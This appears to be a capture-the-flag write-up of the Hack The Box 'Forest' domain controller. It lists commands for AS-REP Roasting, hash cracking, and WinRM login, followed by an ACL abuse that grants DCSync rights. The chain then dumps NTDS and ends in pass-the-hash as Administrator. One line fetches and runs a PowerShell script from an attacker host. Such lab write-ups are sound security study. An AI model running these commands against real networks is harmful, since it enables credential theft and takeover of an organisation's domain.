[HTB] Forest Writeup
HTB Forest write-up
TL;DR
AS-REP Roasting exposed the svc-alfresco account, whose hash was cracked to recover the password s3rvice. Using this credential, WinRM access was obtained. BloodHound revealed an ACL abuse path through Account Operators group and Exchange Windows Permissions group, allowing DCSync privileges to be granted. The NTDS dump then exposed the Administrator NTLM hash, which was used to gain Domain Controller access.
1. Recon
Nmap scan result showed that the target was a Windows Active Directory Domain Controller. Several AD-related services were exposed, including DNS, Kerberos, LDAP, SMB, and WinRM.
port scan result 
2. Initial Access - AS-REP Roasting
LDAP enumeration was performed without valid credentials.
1
└─$ nxc ldap 10.129.95.210 -u '' -p '' --users
The enumeration output disclosed multiple domain user accounts. The svc-alfresco account was identified as a valid domain user and was later confirmed to be vulnerable to AS-REP Roasting.
AS-REP Roasting is possible when Kerberos pre-authentication is disabled for a user account. In this configuration, an attacker can request an AS-REP response for the account and attempt to crack the encrypted response offline.
1
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.129.95.210 -request
The AS-REP hash for svc-alfresco was successfully obtained.
The recovered hash was then cracked offline using hashcat with the rockyou.txt
1
└─$ hashcat -m 18200 -a 0 asreproast.hash /usr/share/wordlists/rockyou.txt
1
svc-alfresco:s3rvice
The recovered credential was used to authenticate to the target through WinRM.
1
└─$ evil-winrm -i 10.129.95.210 -u 'svc-alfresco' -p 's3rvice'
3. Privilege Escalation - ACL Abuse to DCSync
After initial access was obtained, AD enumeration using bloodhound was performed using the compromised svc-alfresco credentials.
1
└─$ sudo bloodhound-python -u 'svc-alfresco' -p 's3rvice' -d htb.local -c All -dc forest.htb.local --zip
BloodHound identified the following privilege escalation path.
1
2
3
4
svc-alfresco
-> member of Account Operators
-> GenericAll over Exchange Windows Permissions
-> WriteDACL over htb.local domain
The svc-alfresco user was a member of the Account Operators group. This group had GenericAll privileges over the Exchange Windows Permissions group.
The Exchange Windows Permissions group had WriteDACL privileges over the htb.local domain object. Therefore, by adding svc-alfresco to Exchange Windows Permissions, it was possible to abuse WriteDACL and grant svc-alfresco DCSync rights over the domain.
First, powerview.ps was loaded in memory.
1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.107:80/powerview.ps1')
Then, svc-alfresco was added to the Exchange Windows Permissions group.
1
*Evil-WinRM* PS C:\Users\svc-alfresco> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco
After that, a credential object was created for svc-alfresco and ysing the newly abused ACL path, DCSync rights were granted to svc-alfresco.
1
2
3
4
$pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity svc-alfresco -TargetIdentity 'htb.local\domain admins' -Rights DCSync
With DCSync privileges assigned, the NTDS database was dumped remotely.
1
└─$ nxc smb 10.129.200.15 -u svc-alfresco -p 's3rvice' --ntds
The Administrator NTLM hash was recovered from the dump.
1
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::
The recovered NTLM hash was then used for Pass-the-Hash authentication through WinRM and administrative access was successfully obtained.
1
└─$ evil-winrm -i 10.129.200.15 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
